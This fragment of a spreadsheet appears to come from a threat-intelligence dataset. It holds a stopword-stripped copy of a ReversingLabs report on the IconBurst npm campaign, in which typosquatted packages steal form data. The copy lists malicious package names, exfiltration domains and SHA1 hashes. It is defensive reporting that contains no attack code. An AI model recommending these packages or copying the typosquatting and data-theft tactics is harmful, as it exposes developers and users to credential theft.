december author fontsawesome also targeted already mentioned ionicons icon domain used data exfiltration packages used first versions iconpackage package hxxpsgraphgoogleapiscom exact start campaign unknown malicious package published december middle focused mimicking ionicons framework point attackers switched developing packages reused functionality also started targeting popular frameworks packages called umbrellaks obvious attempt typosquatting attack quite popular umbrellajs javascript document object model manipulation framework also observed several packages published account arpanrizki engaging similar form datagrabbing however exfiltration domain associated packages different hxxpsarpanrizkimyid form identifier exfiltrated data quite specific validateverificationdataform part investigation performed github search identifier interesting results figure figure github search results results show github repositories containing string question maintained arpantek nickname similar author result related hackingtool repository belonging author woxruz figure woxruz’s hackingtool last commit’s description gives clue intended software projects tools designed “hacking pubg i’d” pubg popular onlinemultiplayer video game large number users words seems person behind arpantek arpanrizki accounts tried port login stealing script ecosystem expand reach names packages published arpanrizki also suggest targeting popular javascript frameworks like ionicons sidr particular sidr package hasn’t maintained years still weekly downloads makes good target packages published author since removed replaced placeholders sidr package description confirms phase campaign main target actor behind arpanrizki account pubg users figure sidr package description content referenced website hungry data malicious packages initially observed took conservative approach harvesting form data recently published malicious packages taking aggressive approach acquiring data another malicious package identified footericon gathers data form elements defined “loginform” class figure form data exfiltration code footericon package similarly swiperbundie package malicious package targeting popular javascript framework swiper uses embedded jquery approach extending function functionality gathers data every form element page figure form data exfiltration code swiperbundie package clues hidden code can’t identify actors responsible attacks clues structure campaign abound deployed packages example swiperbundie package contains javascript header payload script cleartext comments name author package alberto varela author sidr package targeted arpanrizki author similarly long commented javascript oneliner also contains several references sidr package figure comment header beginning payload swiperbundie package finally malicious packages exfiltration domains consistent naming pattern subdomainmyid together clues suggest common actor behind various malicious packages unified campaign list malicious modules author package name download count fontsawesome ionicicon ionicio ionicio iconpackage ajaxlibs umbrellaks ajaxlibrary arpanrizki iconionpackage packagesidr kbrstore iconspackage subek packageshow packageicon kbrstore iconspackages ioniconpackage iconspack packicons ioniconspack aselole packageionicons packageionicon base64javascript ioniconsjs ioniconsjson footericon footericon ajaxlibz roar01 roar02 wkwk100 swiperbundie ajaxlibz swiperbundle atez ajaxgoogleapis tezdoank ryucha ajaxapis tescodek atezzz libzjquery ajaxlibary kabarstre iconionicon iconionicons arpanpackage ionpackage packageion ionpackages ionpackagesa ditznesiaa basencrypt basecrypt cdnpjs cndpjs patternjson rakaganz rochman footericonfootericon footericons sdomino codashop freefire trueid rakaws logofacebook jubaa ajaxlibss table list malicious packages corresponding download count conclusion reversinglabs’ research uncovered extensive software supply chain attack involving dozen modules used thousands downstream applications indicated package download counts analysis modules reveals evidence coordination malicious modules traceable small number publishers consistent patterns supporting infrastructure exfiltration domains reversinglabs reached team report findings july attack marks significant escalation software supply chain attacks malicious code bundled within modules running within unknown number mobile desktop applications pages harvesting untold amounts user data modules team identified collectively downloaded times development organizations ability detect malicious code within open source libraries modules attacks persisted months coming attention named packages removed still available download time report publishing report hope serves resource development organizations assess exposure malicious modules prepared list affected modules indicators compromise organizations look evidence active attacks looking beyond specific incident clear software development organizations well customers need tools processes assessing supply chain risks like ones posed malicious packages decentralized modular nature application development means applications services strong least secure component success attack dozen malicious modules available download popular package repository downloads matter weeks underscores freewheeling nature application development barriers malicious even vulnerable code entering sensitive applications environments indicators compromise domains extracted analyzed packages graphgoogleapiscom ioniciocom curlssafhostingxyz arpanrizkimyid dnstermyid okeprenznesiaxyz ryuchamyid panelllgege001wwwcom ngescrpmyid apiiixyzyogaxmyid panelarchodexxyz panelcurlzonline apimlbbx02ml package versions package name package version sha1 ionicicon 8ab228743d3fef5c89aa55c7d3a714361249eba8 ionicio f0221e1707075e2976010d279494bb73f0b169c7 iconpackage 9299a3eb1f11fcc090c7584bb9ce895ba38fd2cb iconpackage 6092606456adce8eb705ba33ad3e9536682d917f iconpackage d106693abc732a93176085410c67c4581de28447 iconpackage 5a631ab46373251dade6dca5bb460b55bf738a64 iconpackage c173de3d3ee1dd0920ee5a3a4f80d8c280ce2697 iconpackage 49f2bc011d1beece62b7a4ed47818e288b71edb6 iconpackage cf8a7066865ab6d009e226096fa879867b8e61bc iconpackage 6e2b0d621bf6031beee18b897b2da5d93d3ce5e7 iconpackage 164ff2295b63434e8b260a46041669c98eab4235 iconpackage 96aca5e901bd8f1229683339766073e4e5d1de59 iconpackage 6253324c1d741c1be3ae20fd8262adb54530ee8b iconpackage c77eda629d2076663276bc48c7462ea07470dbdc iconpackage b7dc23a51469574205b0691944f4120e2d92e64d iconpackage 83e5ebd7f355b1655778a37db6b6953042fb77c4 iconpackage 123dad7d48c47486e9c226ad50b26b2ba5ec9fe2 iconpackage 17fef01df47ceb87b2755f4a18db23d8f7276d30 iconpackage ae70ef4e5a0bb522179e5d488ed56efb9ae5b4d9 iconpackage e66609e433e5b51a148889ff128bd7182fe22d4b ajaxlibs 54549337e60eede3d4dc6b52662c582449b66c40 ajaxlibs fd72a461bb62dce8989f1c24bdcc6ae6d4eaabc5 ajaxlibs 66c41baf38e29c4b0a979cff35df4a1eed11e13e umbrellaks 81031febc2ed49bdd8c8f7ca810830df1b0d3476 ajaxlibrary 326dab8f5d4dab461ca5fd14f136503d12227eae ajaxlibrary 2afd6730426166f061d96a8ccbfba8d8c7ed9e3e iconionpackage 73db956f7f752c4f71a8a8588604fa7d7af7de7e packagesidr 87cb0505dbb141391103e2bd358f3aa774210a4a kbrstore 7e14150502ee992fc8b1259de58261aeb2f58ae1 iconspackage fb672c0b982542eeacce66be67a5bc4ff9567596 iconspackage a386ddf8fb1d0846e01501f6fbac11e0389ef581 iconspackage a5ad7a0edda67b7267694898a82abbee1ec7a466 iconspackage 20254c86209118144e6a25fb90abea6f7c903d8e subek 68d1c1883cfab75fa933ab08189ba7abbd2625a8 packageshow def789dc6322255264703c00d4f4dd265a48b50e packageicon 1a719f2efa398ef8659a401e6209377beab87105 iconspackages a2d25c070750cbd20f0c327980a40c26f4ea47ec ioniconpackage f78a57ab8e288c725e452787f3b070ec690f276b iconspack 6388e354433f8c608ab8a97ed9391b9dc44d2a99 packicons cda4b444744196ae9b2753830f750bc5e4548061 packageionicons abb8ff44d224b23266769d0808ebe97c3838e484 packageionicon c11d9aa077207adeef30cfdd9df3fe979e114b06 footericon 067e42878df480c0d1ca45c268300c96a258be63 footericon 06dbd365e76e7cb593df86a80385e8c46ca05545 footericon 8562edf90e988f7ca556183c2f032bc307dfefdb footericon 08bc77bb17b6a4ab365d0354683cbd912219becf footericon 9f5f2f34f15a03c4528d6fa632899d0e3b6d1ceb roar01 8c128c3be9645582db2fee9e64e175149d51d92c roar02 a1e2cb98d2aa1b134b3be04d6a720393dcf6c072 wkwk100 9f2a2001a07b92adef023ca697e4febba073728e swiperbundie b64a10493897c96feb6eda1d0c9fc7ec85506258 ajaxlibz dd01c6baadd1d79f29b3d69a300e82b860edc57d swiperbundle 05d2084e1b2ce1d28c3096f16694413ec480704e swiperbundle 1de14d6be4029aa7888f8fc83779b61c96c063da swiperbundle 06cb7b1810ca1485e15fa81d92bd92533ff8c001 swiperbundle fa234405c958a9ff22bac7debfbcde452294d73c swiperbundle 64cd1eda88f92b32323f9784aab6d1a0bdd7a38c ioniconspack fe59a8d59f6764800ce5b85f2bfbc4db05840bae base64javascript 77170de7458ee81382efd7de2499694a459abee3 ioniconsjs 069f9c723af8be981a3e6220b991b9c40320d8b5 ioniconsjson 52a96612e3d2df0a7980de81d622da6c5ff84513 atez c6569dc3fd94f642cad56cb7a950175ff7c2062f ajaxgoogleapis 77a0f0cc89e98b9662b224b653a35895d3ac69fa tezdoank eec7e3769b4d8b23aeb00f81583750ed26fadc47 tezdoank 5ba35812337b3c7a0064accf17479a26de486951 ajaxapis 2a8c46d643d3027b3815eecbbfd183a7dee9e91d tescodek 8304b8c9549d08e3c258ce22f99587843bb52c00 atezzz bc494a3249ce95b7cea5a62e29ee3cc023e2b5b1 atezzz e2bc4408cea300c0f852e16665e7279cf5d0cd69 atezzz b5b8d49f302cfeee5cb4dcf134320861c9fdaa66 libzjquery 9a41b333143eb0ad75bb93288a988ec8387379ca libzjquery fd7197e446107ba047a2fa43814cdecc794b3dae libzjquery 1517b34ed31cf3f2815105d344dd0b845d48d092 libzjquery 4e30e0d1cf39cdaf5f03b7afda81aa2aed6a6d5d ajaxlibary 50d681e5c016904b0080ad70f40abb86926849a0 iconionicon 6132a31838fa836aeadbbe39054de9fa702c8fbb iconionicons a28477cc116aa0de478014d6f4adb1603cdd6bb1 arpanpackage 8dfd7a91308508b859bf464df375030e6231602f ionpackage 243base 5f66bb7a4df11b16238de0c1ad33dddafec779f4 packageion 243icons f7d09b4429f59e136796a70410b689754c355708 basencrypt 9c11c8512ae2f1ed0d4e7ece99e7aa42dd77d4e2 basecrypt 45162797b66a8ea41f530468bca09b5f783383f4 cdnpjs a3c9595043120c3471c58d6fa43893f34c12b402 cndpjs 2b112481f4adba7b840a397bad7d00acb59ee256 cdnpjs 7e5228665b9396b60c3c7b7024bb948cc45c4a84 patternjson 879699f620acf2b9c7d24a5fd89e008ac60f4b57 rochman 07280f0b4ec2db03143e1f7add5fd0a04f9b7f3b rochman dfbcb2e7e3fc7444415fc5575d8d2a793f9ae668 footericonfootericon 9b8b5fa9e36ed902045ca5de26c00ddd9a035d36 footericons b38aa72b39fc015c0366e11d072de0947266e884 sdomino ae603d5a3d8360d076a62d9622679d1a0c79b395 footericons f0fff262a3dda9b8ca0e0cfedd1808ec0342be75 codashop 6353469679f07b8d6f5870c1e211b17bd575ea89 freefire a6ef2f3538571db4119d5466b9a3d2a91a984bcc trueid e00999f831120a0fc5b37986c0e2d1af947caf0b ionpackages 221base 925c585c1b1507bf29deb89a4db9fe1f90721140 ionpackagesa 245icons 9b1d41d813067d16de7a77512cf205603cb555fa logofacebook ec731509e1478decc6020f9dd57b196853f456c5 ajaxlibss ff862d407422fcca070f726e0aa477c9a93b270b complete affected package list httpsblogreversinglabscomhubfsblogiconburstpackageversionstsv speed trends understand landscape state software supply chain plus learn reversinglabs spectra assure software supply chain keep learning update understanding buyers guide software supply chain join webinar need upgrade appsec report take action state supply chain join discussion state software supply chain webinar gartners guidance managing software supply chain risk tags research blog posts appsec supply chain march software supply chain numbers stats matter understand state software supply chain takeaways recent research surveys application development pros read research march suspicious nuget package grabs data industrial systems espionage long driver malicious cyber campaigns heres research team knows suspicious sqzrframework480 campaign read devsecops march memorysafe languages design insights lessons learned memory safety stubborn dangerous software weaknesses insights takeaways google report issue read topics blog posts appsec supply chain devsecops research operations products technology company events follow youtube linkedin subscribe best blog delivered inbox weekly stay date trends analysis best practices across intelligence software supply chain special reports state software supply chain january latest blog posts securing medical devices sboms conversations hunting software supply chain reproducible builds graduate software supply chain glassboard conversations reversinglabs field ciso matt rose software package deconstruction video conferencing software analyzing risks software supply chain software supply chain hotline need immediate assistance software supply chain issue contact sscs incident response blog webinars demo videos events news glossary careers contact privacy policy cookies rights reserved reversinglabs</t>
+          <t xml:space="preserve">A large number of NPM packages containing jQuery scripts designed to steal form data from deployed applications that include them were identified. </t>
         </is>
       </c>
       <c r="D184" t="inlineStr">
         <is>
           <t>https://blog.reversinglabs.com/blog/iconburst-npm-software-supply-chain-attack-grabs-data-from-apps-websites</t>
-        </is>
-      </c>
-      <c r="E184" t="inlineStr">
-        <is>
-          <t>['buyer', 'guide', 'software', 'supply', 'chain', 'download', 'moment', 'actionable', 'spot', 'report', 'enterprise', 'software', 'supply', 'chain', 'risk', 'insight', 'solution', 'software', 'supply', 'chain', 'procurement', 'spectra', 'build', 'release', 'automate', 'support', 'triage', 'incident', 'response', 'protect', 'cloud', 'file', 'share', 'ransomware', 'feed', 'sandbox', 'email', 'intelligence', 'platform', 'intelligence', 'platform', 'product', 'technology', 'product', 'technology', 'titanium', 'platform', 'assure', 'software', 'supply', 'chain', 'elastic', 'infrastructure', 'analysis', 'free', 'open', 'source', 'yara', 'rule', 'partner', 'partner', 'partner', 'value', 'partner', 'marketplace', 'alliance', 'resource', 'resource', 'blog', 'content', 'library', 'software', 'deconstruction', 'demo', 'series', 'reversingglass', 'concept', 'rule', 'video', 'company', 'company', 'leadership', 'career', 'series', 'investment', 'company', 'news', 'event', 'event', 'press', 'release', 'news', 'demo', 'contact', 'support', 'login', 'blog', 'developer', 'portal', 'search', 'reversinglab', 'blog', 'research', 'software', 'supply', 'chain', 'attack', 'data', 'app', 'website', 'researcher', 'widespread', 'campaign', 'malicious', 'module', 'sensitive', 'datum', 'form', 'mobile', 'app', 'website', 'blog', 'author', 'engineer', 'reversinglab', 'executive', 'summary', 'update', 'publication', 'blog', 'malicious', 'package', 'attributable', 'account', 'original', 'report', 'addition', 'content', 'distribution', 'network', 'infrastructure', 'script', 'inclusion', 'blog', 'post', 'late', 'information', 'threat', 'information', 'available', 'researcher', 'evidence', 'widespread', 'software', 'supply', 'chain', 'attack', 'malicious', 'javascript', 'package', 'package', 'manager', 'researcher', 'dozen', 'package', 'month', 'steal', 'form', 'datum', 'individual', 'application', 'website', 'malicious', 'package', 'close', 'inspection', 'evidence', 'supply', 'chain', 'attack', 'large', 'number', 'package', 'jquery', 'script', 'steal', 'form', 'datum', 'application', 'full', 'extent', 'attack', 'malicious', 'package', 'hundred', 'thousand', 'downstream', 'mobile', 'desktop', 'application', 'website', 'malicious', 'package', 'time', 'recent', 'benign', 'dependency', 'confusion', 'attack', 'german', 'organization', 'malicious', 'attack', 'technique', 'attacker', 'package', 'public', 'repository', 'name', 'similar', 'common', 'misspelling', 'legitimate', 'package', 'attacker', 'hightraffic', 'module', 'umbrellajs', 'package', 'software', 'datum', 'development', 'organization', 'real', 'target', 'attack', 'comparable', 'infamous', 'solarwind', 'recent', 'supply', 'chain', 'similarity', 'domain', 'exfiltrate', 'datum', 'various', 'module', 'campaign', 'control', 'single', 'actor', 'detailed', 'information', 'widespread', 'software', 'supply', 'chain', 'attack', 'indicator', 'attack', 'recommendation', 'malicious', 'module', 'research', 'team', 'opensource', 'package', 'repository', 'malicious', 'code', 'planting', 'software', 'supply', 'chain', 'attack', 'analysis', 'package', 'popular', 'public', 'package', 'repository', 'scan', 'proprietary', 'titanium', 'platform', 'deep', 'file', 'repository', 'goodware', 'badware', 'spot', 'malicious', 'suspicious', 'element', 'plain', 'view', 'software', 'supply', 'chain', 'platform', 'past', 'work', 'platform', 'team', 'workflow', 'container', 'package', 'spot', 'nascent', 'active', 'software', 'supply', 'chain', 'evidence', 'active', 'software', 'supply', 'chain', 'attack', 'package', 'javascript', 'obfuscator', 'hide', 'functionality', 'analysis', 'package', 'proof', 'dependency', 'confusion', 'attack', 'software', 'supply', 'chain', 'german', 'company', 'number', 'industry', 'repository', 'package', 'obfuscator', 'usage', 'obfuscation', 'technique', 'several', 'account', 'malicious', 'code', 'steal', 'form', 'datum', 'user', 'application', 'discussion', 'core', 'capability', 'securesoftware', 'solution', 'code', 'intent', 'malicious', 'behavior', 'indicator', 'kind', 'software', 'behavior', 'network', 'file', 'system', 'activity', 'packer', 'malicious', 'campaign', 'evasion', 'technique', 'obfuscation', 'technique', 'obfuscator', 'component', 'javascript', 'application', 'eye', 'steal', 'reverse', 'engineer', 'code', 'respectable', 'bona', 'fide', 'obfuscator', 'laudable', 'purpose', 'research', 'several', 'instance', 'malicious', 'package', 'tool', 'malicious', 'code', 'point', 'encounter', 'behavior', 'close', 'look', 'presence', 'obfuscator', 'indicator', 'team', 'wide', 'range', 'package', 'last', 'month', 'obfuscator', 'total', 'dozen', 'package', 'name', 'package', 'striking', 'similarity', 'check', 'list', 'suspect', 'package', 'package', 'javascript', 'obfuscator', 'spot', 'pattern', 'deep', 'investigation', 'module', 'connection', 'handful', 'account', 'name', 'form', 'datum', 'figure', 'package', 'team', 'package', 'content', 'javascript', 'deobfuscator', 'detailed', 'examination', 'sample', 'collection', 'form', 'datum', 'ajax', 'function', 'datum', 'various', 'domain', 'malicious', 'author', 'word', 'clear', 'evidence', 'malicious', 'intent', 'technique', 'fool', 'developer', 'malicious', 'package', 'legitimate', 'counterpart', 'working', 'package', 'author', 'example', 'show', 'author', 'version', 'package', 'iconpackage', 'malicious', 'form', 'code', 'attempt', 'developer', 'package', 'popular', 'opensource', 'icon', 'icon', 'android', 'desktop', 'app', 'version', 'data', 'iconpackage', 'download', 'stat', 'malicious', 'iconpackage', 'datum', 'package', 'pass', 'domain', 'legitimate', 'ionicon', 'framework', 'domain', 'easy', 'application', 'developer', 'ruse', 'ecosystem', 'visual', 'similarity', 'fake', 'ionic', 'page', 'legitimate', 'ionic', 'page', 'figure', 'figure', 'fake', 'ionic', 'webpage', 'figure', 'legitimate', 'ionic', 'webpage', 'hood', 'malicious', 'package', 'script', 'behavior', 'ajax', 'function', 'form', 'datum', 'domain', 'attacker', 'data', 'function', 'content', 'target', 'check', 'trail', 'process', 'origin', 'campaign', 'old', 'package', 'type', 'malicious', 'functionality', 'author', 'ionicon', 'icon', 'domain', 'datum', 'exfiltration', 'package', 'first', 'version', 'iconpackage', 'package', 'unknown', 'malicious', 'package', 'middle', 'ionicon', 'framework', 'point', 'attacker', 'package', 'functionality', 'popular', 'framework', 'package', 'umbrellak', 'obvious', 'attempt', 'attack', 'popular', 'umbrellajs', 'javascript', 'document', 'object', 'model', 'manipulation', 'framework', 'several', 'package', 'account', 'arpanrizki', 'similar', 'form', 'datagrabbing', 'exfiltration', 'package', 'different', 'hxxpsarpanrizkimyid', 'form', 'identifi', 'datum', 'specific', 'validateverificationdataform', 'part', 'investigation', 'interesting', 'result', 'figure', 'figure', 'search', 'result', 'result', 'repository', 'string', 'question', 'similar', 'author', 'result', 'related', 'hackingtool', 'repository', 'author', 'woxruz', 'figure', 'hackingtool', 'last', 'commit', 'description', 'clue', 'software', 'project', 'tool', 'pubg', 'popular', 'onlinemultiplayer', 'video', 'game', 'large', 'number', 'user', 'word', 'person', 'account', 'port', 'login', 'script', 'ecosystem', 'name', 'package', 'arpanrizki', 'popular', 'javascript', 'framework', 'ionicon', 'sidr', 'particular', 'sidr', 'package', 'year', 'weekly', 'download', 'good', 'target', 'package', 'author', 'placeholder', 'package', 'description', 'phase', 'campaign', 'main', 'target', 'actor', 'user', 'package', 'description', 'content', 'website', 'hungry', 'datum', 'malicious', 'package', 'conservative', 'approach', 'harvesting', 'form', 'datum', 'malicious', 'package', 'aggressive', 'approach', 'datum', 'malicious', 'package', 'footericon', 'data', 'form', 'element', 'loginform', 'class', 'figure', 'form', 'datum', 'exfiltration', 'code', 'footericon', 'package', 'package', 'malicious', 'package', 'popular', 'javascript', 'framework', 'swiper', 'jquery', 'approach', 'function', 'functionality', 'datum', 'form', 'element', 'page', 'figure', 'form', 'datum', 'exfiltration', 'code', 'swiperbundie', 'package', 'clue', 'code', 'actor', 'responsible', 'attack', 'clue', 'structure', 'campaign', 'package', 'example', 'swiperbundie', 'package', 'javascript', 'header', 'payload', 'script', 'cleartext', 'comment', 'name', 'author', 'package', 'author', 'arpanrizki', 'author', 'oneliner', 'several', 'reference', 'sidr', 'package', 'figure', 'comment', 'header', 'payload', 'swiperbundie', 'package', 'malicious', 'package', 'exfiltration', 'domain', 'consistent', 'naming', 'pattern', 'subdomainmyid', 'clue', 'common', 'actor', 'various', 'malicious', 'package', 'campaign', 'list', 'malicious', 'module', 'author', 'package', 'name', 'download', 'count', 'arpanrizki', 'iconionpackage', 'packagesidr', 'kbrstore', 'iconspackage', 'ioniconpackage', 'iconspack', 'packicon', 'aselole', 'packageionicon', 'packageionicon', 'arpanpackage', 'ionpackage', 'packageion', 'rochman', 'footericonfootericon', 'footericon', 'freefire', 'trueid', 'rakaw', 'table', 'list', 'malicious', 'package', 'download', 'count', 'conclusion', 'research', 'extensive', 'software', 'supply', 'chain', 'attack', 'dozen', 'module', 'thousand', 'downstream', 'application', 'package', 'download', 'analysis', 'module', 'evidence', 'coordination', 'malicious', 'module', 'traceable', 'small', 'number', 'publisher', 'consistent', 'pattern', 'infrastructure', 'exfiltration', 'domain', 'team', 'report', 'finding', 'significant', 'escalation', 'software', 'supply', 'chain', 'attack', 'malicious', 'code', 'module', 'unknown', 'number', 'mobile', 'desktop', 'application', 'page', 'untold', 'amount', 'user', 'data', 'module', 'team', 'time', 'development', 'organization', 'ability', 'malicious', 'code', 'open', 'source', 'library', 'module', 'attack', 'month', 'attention', 'package', 'available', 'download', 'time', 'report', 'publishing', 'report', 'hope', 'resource', 'development', 'organization', 'exposure', 'malicious', 'module', 'list', 'module', 'indicator', 'compromise', 'organization', 'evidence', 'active', 'attack', 'specific', 'incident', 'clear', 'software', 'development', 'organization', 'customer', 'tool', 'supply', 'chain', 'risk', 'one', 'malicious', 'package', 'modular', 'nature', 'application', 'development', 'application', 'service', 'strong', 'secure', 'component', 'success', 'attack', 'dozen', 'malicious', 'module', 'available', 'download', 'popular', 'package', 'repository', 'matter', 'week', 'nature', 'application', 'development', 'barrier', 'malicious', 'vulnerable', 'code', 'sensitive', 'application', 'environment', 'indicator', 'compromise', 'domain', 'package', 'okeprenznesiaxyz', 'panelarchodexxyz', 'package', 'version', 'package', 'name', 'package', 'version', 'iconpackage', 'iconpackage', 'iconpackage', 'd106693abc732a93176085410c67c4581de28447', 'iconpackage', 'iconpackage', 'iconpackage', '49f2bc011d1beece62b7a4ed47818e288b71edb6', 'iconpackage', 'iconpackage', 'iconpackage', 'iconpackage', 'iconpackage', 'iconpackage', 'c77eda629d2076663276bc48c7462ea07470dbdc', 'iconpackage', 'b7dc23a51469574205b0691944f4120e2d92e64d', 'iconpackage', 'iconpackage', 'iconpackage', '17fef01df47ceb87b2755f4a18db23d8f7276d30', 'iconpackage', 'iconpackage', 'umbrellak', 'ajaxlibrary', 'ajaxlibrary', 'iconionpackage', 'packagesidr', 'kbrstore', 'iconspackage', 'fb672c0b982542eeacce66be67a5bc4ff9567596', 'iconspackage', 'iconspackage', 'a5ad7a0edda67b7267694898a82abbee1ec7a466', 'iconspackage', 'packageshow', 'def789dc6322255264703c00d4f4dd265a48b50e', 'a2d25c070750cbd20f0c327980a40c26f4ea47ec', 'ioniconpackage', 'iconspack', 'packicon', 'packageionicon', 'packageionicon', 'footericon', 'footericon', 'a1e2cb98d2aa1b134b3be04d6a720393dcf6c072', 'ajaxlibz', 'swiperbundle', 'fa234405c958a9ff22bac7debfbcde452294d73c', 'ioniconsjs', 'ioniconsjson', 'atezzz', 'libzjquery', 'fd7197e446107ba047a2fa43814cdecc794b3dae', 'libzjquery', '4e30e0d1cf39cdaf5f03b7afda81aa2aed6a6d5d', 'iconionicon', 'iconionicon', 'arpanpackage', 'ionpackage', 'packageion', '243icon', 'basencrypt', 'rochman', 'rochman', 'footericonfootericon', '9b8b5fa9e36ed902045ca5de26c00ddd9a035d36', 'footericon', 'sdomino', 'ae603d5a3d8360d076a62d9622679d1a0c79b395', 'footericon', 'freefire', 'trueid', 'e00999f831120a0fc5b37986c0e2d1af947caf0b', 'ionpackage', 'ionpackagesa', '245icon', 'complete', 'affected', 'package', 'list', 'httpsblogreversinglabscomhubfsblogiconburstpackageversionstsv', 'speed', 'trend', 'landscape', 'state', 'software', 'supply', 'chain', 'spectra', 'assure', 'software', 'supply', 'chain', 'update', 'understanding', 'buyer', 'software', 'supply', 'chain', 'webinar', 'upgrade', 'report', 'action', 'state', 'supply', 'chain', 'discussion', 'state', 'software', 'supply', 'chain', 'webinar', 'gartner', 'guidance', 'software', 'supply', 'chain', 'risk', 'tag', 'research', 'blog', 'post', 'supply', 'chain', 'software', 'supply', 'chain', 'number', 'stat', 'state', 'software', 'supply', 'chain', 'recent', 'research', 'survey', 'application', 'development', 'pro', 'research', 'suspicious', 'nuget', 'package', 'data', 'industrial', 'system', 'long', 'driver', 'malicious', 'cyber', 'campaign', 'research', 'team', 'suspicious', 'sqzrframework480', 'campaign', 'devsecop', 'language', 'insight', 'lesson', 'memory', 'safety', 'stubborn', 'dangerous', 'software', 'weakness', 'insight', 'takeaway', 'issue', 'topic', 'blog', 'post', 'supply', 'chain', 'research', 'operation', 'product', 'technology', 'company', 'event', 'linkedin', 'subscribe', 'good', 'blog', 'inbox', 'weekly', 'date', 'trend', 'analysis', 'good', 'practice', 'intelligence', 'software', 'supply', 'chain', 'special', 'report', 'state', 'software', 'supply', 'chain', 'late', 'blog', 'post', 'medical', 'device', 'conversation', 'software', 'supply', 'chain', 'graduate', 'software', 'supply', 'chain', 'glassboard', 'conversation', 'field', 'software', 'package', 'deconstruction', 'video', 'conferencing', 'software', 'risk', 'software', 'supply', 'chain', 'software', 'supply', 'chain', 'hotline', 'immediate', 'assistance', 'software', 'supply', 'chain', 'issue', 'contact', 'response', 'blog', 'webinar', 'demo', 'video', 'news', 'glossary', 'career', 'contact', 'privacy', 'policy', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
